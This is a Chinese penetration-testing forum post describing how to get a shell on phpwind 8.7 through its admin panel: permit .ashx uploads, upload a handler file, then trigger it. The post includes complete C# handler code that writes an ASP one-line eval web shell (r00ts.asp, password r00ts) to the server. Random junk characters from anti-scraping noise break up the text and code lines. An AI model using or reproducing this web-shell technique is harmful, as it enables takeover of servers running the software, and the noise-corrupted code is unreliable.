找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpwind 8.7 后台拿shell
返回列表 发新帖
查看: 3353|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
! }) E0 _) `! q/ R ( g5 M, Q5 N9 {% z# y1 q
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
3 E2 U7 D1 L& q1 ^. _7 V, L0 t 4 w! e8 E" \' X  C  N- C& w0 k
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
& c' ^/ Y+ n& `2 D; O7 M8 p
/ G, b" S( N3 [  p9 o/ G然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx) Y  ]" G' |6 i8 e: o
# _; e5 f1 T9 m1 a2 ^8 x/ h4 n
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
$ K" G' \2 z8 d" z8 {0 f % P$ V  U( R( |) j
下面是代码:. r7 W, A( M& l& Y
$ O- A: l! T$ C
<%@ WebHandler Language="C#"Class="Handler" %>) R7 i* g: U9 V' l
using System;6 [! b0 Y7 N6 F0 k% ?
using System.Web;
5 w3 ?8 W& a& S, T4 u. |! pusing System.IO;5 t  G( c! T, E2 c* [! J
public class Handler : IHttpHandler {
  x: C* _! r) ^" J' @7 S2 epublic void ProcessRequest (HttpContext context) {" b$ V: F5 l9 q1 ?! Z
context.Response.ContentType = "text/plain";; T0 y! P; V3 R2 Z
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));, N) a7 e, ~# B. C
file1.Write("<%eval request(\"r00ts\")%>");
6 o' S% n3 k' G6 n# Xfile1.Flush();# G- n7 v% r- k# G8 R; B
file1.Close();# T9 K1 y- G/ F, q
}8 t1 J; k% Y& b, r
public bool IsReusable {0 L- @! x. i) o, ?
get {+ F/ m7 W! d  x
return false;
# I: h5 x1 H" f2 X+ Y  N2 {}
/ h+ w  c* D/ W9 S' y& j}
8 A5 l* _. u$ Q! @# W$ d}2 d/ X1 Z, }, @7 p' k
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表